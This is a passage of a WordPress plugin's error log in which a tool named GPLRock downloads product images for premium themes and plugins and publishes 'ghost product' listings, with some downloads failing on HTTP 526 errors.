2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sevenbite---health-and-medical-wordpress-theme-29102.webp for product sevenbite-health-and-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:54:25 UTC] GPLRock WARNING: Image download failed for product sevenbite-health-and-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sevenbite---health-and-medical-wordpress-theme-29102.webp [05-Apr-2026 13:54:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sevenbite-health-and-medical-wordpress-theme [05-Apr-2026 13:54:25 UTC] GPLRock: Image download failed for product travivu-travel-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:28 UTC] GPLRock: Image download failed for product travivu-travel-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travivu---travel--tour-booking-wordpress-theme-33671.webp for product travivu-travel-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:54:30 UTC] GPLRock: Image download failed for product travivu-travel-tour-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:32 UTC] GPLRock: Image download failed for product travivu-travel-tour-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:54:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travivu---travel--tour-booking-wordpress-theme-33671.webp for product travivu-travel-tour-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:54:34 UTC] GPLRock WARNING: Image download failed for product travivu-travel-tour-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/travivu---travel--tour-booking-wordpress-theme-33671.webp [05-Apr-2026 13:54:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travivu-travel-tour-booking-wordpress-theme [05-Apr-2026 13:54:34 UTC] GPLRock: Image downloaded successfully for product kiddy-children-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e2f541e.webp [05-Apr-2026 13:54:34 UTC] GPLRock: Using pre-downloaded image for product kiddy-children-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e2f541e.webp [05-Apr-2026 13:54:34 UTC] GPLRock: Ghost product published with image - Product ID: kiddy-children-wordpress-theme [05-Apr-2026 13:55:05 UTC] GPLRock: Image downloaded successfully for product searchwp-bigcommerce-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e926d5a.jpg [05-Apr-2026 13:55:05 UTC] GPLRock: Using pre-downloaded image for product searchwp-bigcommerce-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e926d5a.jpg [05-Apr-2026 13:55:05 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-bigcommerce-integration [05-Apr-2026 13:55:06 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-shipper-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-208d7201.jpg [05-Apr-2026 13:55:06 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-shipper-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-208d7201.jpg [05-Apr-2026 13:55:06 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-shipper-pro [05-Apr-2026 13:55:08 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-hustle (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e3fb1fa.jpg [05-Apr-2026 13:55:08 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-hustle: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e3fb1fa.jpg [05-Apr-2026 13:55:08 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-hustle [05-Apr-2026 13:55:09 UTC] GPLRock: Image downloaded successfully for product page-builder-framework-premium-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99265a9e.jpg [05-Apr-2026 13:55:09 UTC] GPLRock: Using pre-downloaded image for product page-builder-framework-premium-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99265a9e.jpg [05-Apr-2026 13:55:09 UTC] GPLRock: Ghost product published with image - Product ID: page-builder-framework-premium-add-on [05-Apr-2026 13:55:11 UTC] GPLRock: Image downloaded successfully for product thrive-ultimatum (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-255f244d.jpg [05-Apr-2026 13:55:11 UTC] GPLRock: Using pre-downloaded image for product thrive-ultimatum: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-255f244d.jpg [05-Apr-2026 13:55:11 UTC] GPLRock: Ghost product published with image - Product ID: thrive-ultimatum [05-Apr-2026 13:55:12 UTC] GPLRock: Image downloaded successfully for product facetwp-elementor-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-36d10ba2.jpg [05-Apr-2026 13:55:13 UTC] GPLRock: Using pre-downloaded image for product facetwp-elementor-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-36d10ba2.jpg [05-Apr-2026 13:55:13 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-elementor-integration [05-Apr-2026 13:55:14 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-delivery-date-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb679ad0.jpg [05-Apr-2026 13:55:14 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-delivery-date-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-eb679ad0.jpg [05-Apr-2026 13:55:14 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-delivery-date-premium [05-Apr-2026 13:55:15 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-product-bundles-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4f9ca0fe.jpg [05-Apr-2026 13:55:15 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-product-bundles-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4f9ca0fe.jpg [05-Apr-2026 13:55:15 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-product-bundles-premium [05-Apr-2026 13:55:17 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-sequential-order-number-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68ea46cd.jpg [05-Apr-2026 13:55:17 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-sequential-order-number-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68ea46cd.jpg [05-Apr-2026 13:55:17 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-sequential-order-number-premium [05-Apr-2026 13:55:18 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-terms-and-conditions-popup-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c1b4979.jpg [05-Apr-2026 13:55:19 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-terms-and-conditions-popup-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6c1b4979.jpg [05-Apr-2026 13:55:19 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-terms-and-conditions-popup-premium [05-Apr-2026 13:56:07 UTC] GPLRock: Image downloaded successfully for product contentberg-blog-content-marketing-blog (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8d45ed68.jpg [05-Apr-2026 13:56:07 UTC] GPLRock: Using pre-downloaded image for product contentberg-blog-content-marketing-blog: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8d45ed68.jpg [05-Apr-2026 13:56:07 UTC] GPLRock: Ghost product published with image - Product ID: contentberg-blog-content-marketing-blog [05-Apr-2026 13:56:09 UTC] GPLRock: Image downloaded successfully for product buddyboss-platform-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-374edcc4.jpg [05-Apr-2026 13:56:09 UTC] GPLRock: Using pre-downloaded image for product buddyboss-platform-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-374edcc4.jpg [05-Apr-2026 13:56:09 UTC] GPLRock: Ghost product published with image - Product ID: buddyboss-platform-pro [05-Apr-2026 13:56:10 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-ajax-search-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a25853b6.jpg [05-Apr-2026 13:56:10 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-ajax-search-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a25853b6.jpg [05-Apr-2026 13:56:10 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-ajax-search-premium [05-Apr-2026 13:56:12 UTC] GPLRock: Image downloaded successfully for product wooswatches-woocommerce-color-or-image-variation-swatches (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b1310f50.jpg [05-Apr-2026 13:56:12 UTC] GPLRock: Using pre-downloaded image for product wooswatches-woocommerce-color-or-image-variation-swatches: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b1310f50.jpg [05-Apr-2026 13:56:12 UTC] GPLRock: Ghost product published with image - Product ID: wooswatches-woocommerce-color-or-image-variation-swatches [05-Apr-2026 13:56:13 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-product-slider-carousel-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95a02fd7.jpg [05-Apr-2026 13:56:14 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-product-slider-carousel-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-95a02fd7.jpg [05-Apr-2026 13:56:14 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-product-slider-carousel-premium [05-Apr-2026 13:56:15 UTC] GPLRock: Image downloaded successfully for product woocommerce-checkout-field-editor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b2df09c1.jpg [05-Apr-2026 13:56:15 UTC] GPLRock: Using pre-downloaded image for product woocommerce-checkout-field-editor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b2df09c1.jpg [05-Apr-2026 13:56:15 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-checkout-field-editor [05-Apr-2026 13:56:17 UTC] GPLRock: Image downloaded successfully for product woocommerce-advanced-bulk-edit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1df36a60.jpg [05-Apr-2026 13:56:17 UTC] GPLRock: Using pre-downloaded image for product woocommerce-advanced-bulk-edit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1df36a60.jpg [05-Apr-2026 13:56:17 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-advanced-bulk-edit [05-Apr-2026 13:56:18 UTC] GPLRock: Image downloaded successfully for product gravityview-datatables-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ef26943.jpg [05-Apr-2026 13:56:18 UTC] GPLRock: Using pre-downloaded image for product gravityview-datatables-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ef26943.jpg [05-Apr-2026 13:56:18 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-datatables-extension [05-Apr-2026 13:56:20 UTC] GPLRock: Image downloaded successfully for product chromium-auto-parts-shop-wordpress-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab935b91.jpg [05-Apr-2026 13:56:20 UTC] GPLRock: Using pre-downloaded image for product chromium-auto-parts-shop-wordpress-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab935b91.jpg [05-Apr-2026 13:56:20 UTC] GPLRock: Ghost product published with image - Product ID: chromium-auto-parts-shop-wordpress-woocommerce-theme [05-Apr-2026 13:56:22 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-frontend-submissions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ecfb875f.jpg [05-Apr-2026 13:56:22 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-frontend-submissions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ecfb875f.jpg [05-Apr-2026 13:56:22 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-frontend-submissions [05-Apr-2026 13:57:20 UTC] GPLRock: Image downloaded successfully for product themify-wumblr-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0e6f29b5.jpg [05-Apr-2026 13:57:20 UTC] GPLRock: Using pre-downloaded image for product themify-wumblr-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0e6f29b5.jpg [05-Apr-2026 13:57:20 UTC] GPLRock: Ghost product published with image - Product ID: themify-wumblr-wordpress-theme [05-Apr-2026 13:57:21 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-hard-expiration-dates (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c225983e.jpg [05-Apr-2026 13:57:21 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-hard-expiration-dates: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c225983e.jpg [05-Apr-2026 13:57:21 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-hard-expiration-dates [05-Apr-2026 13:57:23 UTC] GPLRock: Image downloaded successfully for product gravity-forms-constant-contact-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b6240aa4.jpg [05-Apr-2026 13:57:23 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-constant-contact-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b6240aa4.jpg [05-Apr-2026 13:57:23 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-constant-contact-addon [05-Apr-2026 13:57:25 UTC] GPLRock: Image downloaded successfully for product beaver-builder-ultimate-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7313a7cf.jpg [05-Apr-2026 13:57:25 UTC] GPLRock: Using pre-downloaded image for product beaver-builder-ultimate-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7313a7cf.jpg [05-Apr-2026 13:57:25 UTC] GPLRock: Ghost product published with image - Product ID: beaver-builder-ultimate-addon [05-Apr-2026 13:57:27 UTC] GPLRock: Image downloaded successfully for product squaretype-modern-blog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-510da49b.jpg [05-Apr-2026 13:57:27 UTC] GPLRock: Using pre-downloaded image for product squaretype-modern-blog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-510da49b.jpg [05-Apr-2026 13:57:27 UTC] GPLRock: Ghost product published with image - Product ID: squaretype-modern-blog-wordpress-theme [05-Apr-2026 13:57:29 UTC] GPLRock: Image downloaded successfully for product woocommerce-customer-order-csv-export (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97ef71e5.jpg [05-Apr-2026 13:57:29 UTC] GPLRock: Using pre-downloaded image for product woocommerce-customer-order-csv-export: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-97ef71e5.jpg [05-Apr-2026 13:57:29 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-customer-order-csv-export [05-Apr-2026 13:57:30 UTC] GPLRock: Image downloaded successfully for product postcode-address-validation-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d4fd8f56.jpg [05-Apr-2026 13:57:30 UTC] GPLRock: Using pre-downloaded image for product postcode-address-validation-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d4fd8f56.jpg [05-Apr-2026 13:57:30 UTC] GPLRock: Ghost product published with image - Product ID: postcode-address-validation-for-woocommerce [05-Apr-2026 13:57:32 UTC] GPLRock: Image downloaded successfully for product wordpress-gdpr (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9756eb79.jpg [05-Apr-2026 13:57:32 UTC] GPLRock: Using pre-downloaded image for product wordpress-gdpr: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9756eb79.jpg [05-Apr-2026 13:57:32 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-gdpr [05-Apr-2026 13:57:34 UTC] GPLRock: Image downloaded successfully for product woocommerce-multilingual (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1bf8b40.jpg [05-Apr-2026 13:57:34 UTC] GPLRock: Using pre-downloaded image for product woocommerce-multilingual: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1bf8b40.jpg [05-Apr-2026 13:57:34 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-multilingual [05-Apr-2026 13:57:35 UTC] GPLRock: Image downloaded successfully for product envira-gallery-pagination-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a56b9164.jpg [05-Apr-2026 13:57:35 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-pagination-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a56b9164.jpg [05-Apr-2026 13:57:36 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-pagination-addon [05-Apr-2026 13:58:25 UTC] GPLRock: Image downloaded successfully for product dynamic-content-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37f2fd3c.jpg [05-Apr-2026 13:58:25 UTC] GPLRock: Using pre-downloaded image for product dynamic-content-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37f2fd3c.jpg [05-Apr-2026 13:58:25 UTC] GPLRock: Ghost product published with image - Product ID: dynamic-content-for-elementor [05-Apr-2026 13:58:27 UTC] GPLRock: Image downloaded successfully for product revo-multipurpose-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72647899.avif [05-Apr-2026 13:58:27 UTC] GPLRock: Using pre-downloaded image for product revo-multipurpose-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72647899.avif [05-Apr-2026 13:58:27 UTC] GPLRock: Ghost product published with image - Product ID: revo-multipurpose-woocommerce-wordpress-theme [05-Apr-2026 13:58:29 UTC] GPLRock: Image downloaded successfully for product all-in-one-addons-for-wpbakery-page-builder-formerly-visual-composer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e45850ba.jpg [05-Apr-2026 13:58:29 UTC] GPLRock: Using pre-downloaded image for product all-in-one-addons-for-wpbakery-page-builder-formerly-visual-composer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e45850ba.jpg [05-Apr-2026 13:58:29 UTC] GPLRock: Ghost product published with image - Product ID: all-in-one-addons-for-wpbakery-page-builder-formerly-visual-composer [05-Apr-2026 13:58:30 UTC] GPLRock: Image downloaded successfully for product bimber-viral-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c670b9d1.jpg [05-Apr-2026 13:58:30 UTC] GPLRock: Using pre-downloaded image for product bimber-viral-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c670b9d1.jpg [05-Apr-2026 13:58:30 UTC] GPLRock: Ghost product published with image - Product ID: bimber-viral-magazine-wordpress-theme [05-Apr-2026 13:58:32 UTC] GPLRock: Image downloaded successfully for product voice-clean-news-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-69654d85.jpg [05-Apr-2026 13:58:32 UTC] GPLRock: Using pre-downloaded image for product voice-clean-news-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-69654d85.jpg [05-Apr-2026 13:58:32 UTC] GPLRock: Ghost product published with image - Product ID: voice-clean-news-magazine-wordpress-theme [05-Apr-2026 13:58:33 UTC] GPLRock: Image downloaded successfully for product woocommerce-frontend-shop-manager-group-staff (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da0aaa69.jpg [05-Apr-2026 13:58:33 UTC] GPLRock: Using pre-downloaded image for product woocommerce-frontend-shop-manager-group-staff: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-da0aaa69.jpg [05-Apr-2026 13:58:33 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-frontend-shop-manager-group-staff [05-Apr-2026 13:58:34 UTC] GPLRock: Image downloaded successfully for product gravity-forms-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-92d5f584.jpg [05-Apr-2026 13:58:34 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-92d5f584.jpg [05-Apr-2026 13:58:34 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-wordpress-plugin [05-Apr-2026 13:58:36 UTC] GPLRock: Image downloaded successfully for product classiads-classified-ads-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68ebbe40.jpg [05-Apr-2026 13:58:36 UTC] GPLRock: Using pre-downloaded image for product classiads-classified-ads-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68ebbe40.jpg [05-Apr-2026 13:58:36 UTC] GPLRock: Ghost product published with image - Product ID: classiads-classified-ads-wordpress-theme [05-Apr-2026 13:58:38 UTC] GPLRock: Image downloaded successfully for product thrive-quiz-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f26d4a1d.jpg [05-Apr-2026 13:58:38 UTC] GPLRock: Using pre-downloaded image for product thrive-quiz-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f26d4a1d.jpg [05-Apr-2026 13:58:38 UTC] GPLRock: Ghost product published with image - Product ID: thrive-quiz-builder [05-Apr-2026 13:58:40 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-ajax-product-filter-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4da1e8b.jpg [05-Apr-2026 13:58:40 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-ajax-product-filter-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4da1e8b.jpg [05-Apr-2026 13:58:40 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-ajax-product-filter-premium [05-Apr-2026 13:59:55 UTC] GPLRock: Image downloaded successfully for product farmino-organic-food-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ad09b6a.jpg [05-Apr-2026 13:59:55 UTC] GPLRock: Using pre-downloaded image for product farmino-organic-food-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ad09b6a.jpg [05-Apr-2026 13:59:55 UTC] GPLRock: Ghost product published with image - Product ID: farmino-organic-food-template-kit [05-Apr-2026 13:59:57 UTC] GPLRock: Image downloaded successfully for product farmex-agriculture-farm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e838bd2.webp [05-Apr-2026 13:59:57 UTC] GPLRock: Using pre-downloaded image for product farmex-agriculture-farm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e838bd2.webp [05-Apr-2026 13:59:57 UTC] GPLRock: Ghost product published with image - Product ID: farmex-agriculture-farm-elementor-template-kit [05-Apr-2026 13:59:59 UTC] GPLRock: Image downloaded successfully for product fang-halloween-party-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-238f07f8.jpg [05-Apr-2026 13:59:59 UTC] GPLRock: Using pre-downloaded image for product fang-halloween-party-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-238f07f8.jpg [05-Apr-2026 13:59:59 UTC] GPLRock: Ghost product published with image - Product ID: fang-halloween-party-elementor-template-kit [05-Apr-2026 14:00:00 UTC] GPLRock: Image downloaded successfully for product fabphoto-photography-and-portfolio-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a40e4c8.webp [05-Apr-2026 14:00:00 UTC] GPLRock: Using pre-downloaded image for product fabphoto-photography-and-portfolio-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a40e4c8.webp [05-Apr-2026 14:00:00 UTC] GPLRock: Ghost product published with image - Product ID: fabphoto-photography-and-portfolio-template-kit [05-Apr-2026 14:00:02 UTC] GPLRock: Image downloaded successfully for product ezer-outdoor-adventure-equipment-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b8b08929.jpg [05-Apr-2026 14:00:02 UTC] GPLRock: Using pre-downloaded image for product ezer-outdoor-adventure-equipment-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b8b08929.jpg [05-Apr-2026 14:00:02 UTC] GPLRock: Ghost product published with image - Product ID: ezer-outdoor-adventure-equipment-store-elementor-template-kit [05-Apr-2026 14:00:04 UTC] GPLRock: Image downloaded successfully for product ezectric-electrical-supply-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b21e954e.jpg [05-Apr-2026 14:00:04 UTC] GPLRock: Using pre-downloaded image for product ezectric-electrical-supply-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b21e954e.jpg [05-Apr-2026 14:00:04 UTC] GPLRock: Ghost product published with image - Product ID: ezectric-electrical-supply-store-elementor-template-kit [05-Apr-2026 14:00:05 UTC] GPLRock: Image downloaded successfully for product eyee-eye-clinic-vision-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecc18edb.webp [05-Apr-2026 14:00:05 UTC] GPLRock: Using pre-downloaded image for product eyee-eye-clinic-vision-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ecc18edb.webp [05-Apr-2026 14:00:05 UTC] GPLRock: Ghost product published with image - Product ID: eyee-eye-clinic-vision-care-elementor-template-kit [05-Apr-2026 14:00:06 UTC] GPLRock: Image downloaded successfully for product exposure-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-556bbad3.webp [05-Apr-2026 14:00:07 UTC] GPLRock: Using pre-downloaded image for product exposure-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-556bbad3.webp [05-Apr-2026 14:00:07 UTC] GPLRock: Ghost product published with image - Product ID: exposure-personal-portfolio-elementor-template-kit [05-Apr-2026 14:00:08 UTC] GPLRock: Image downloaded successfully for product 